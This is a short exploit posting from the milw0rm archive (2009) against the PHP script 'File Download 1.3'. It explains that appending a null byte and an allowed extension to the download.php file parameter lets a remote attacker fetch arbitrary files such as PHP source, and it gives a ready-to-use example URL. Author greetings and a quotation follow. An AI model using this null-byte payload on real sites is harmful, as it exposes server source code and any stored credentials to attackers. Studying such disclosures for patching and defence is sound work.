--------------------------------------------------- "File Download 1.3" Remote File Download Exploit. --------------------------------------------------- By :Aodrulez. Email :f3arm3d3ar@gmail.com Blog :aodrulez.blogspot.com. --------------------------------------------------- Script Name:File Download 1.3 Vendor :http://www.zubrag.com/scripts/ Description: This particular php script,named as "download.php" can be tricked into allowing a remote attacker to download all kinds of files such as .php,.txt etc etc.This can be achieved by adding a null byte followed by an allowed extension..for eg: http://www.site.com/download.php?f=/path/file.php%00.jpg ----------------------------------------------------- Greetz Fly Out to: 1] Amforked() : My Mentor. 2] The Blue Genius : My Boss. 3] www.OrchidSeven.com. "If you think C++ is not overly complicated, just what is a protected abstract virtual base pure virtual private destructor, and when was the last time you needed one?" -- Tom Cargil. # milw0rm.com [2009-04-29]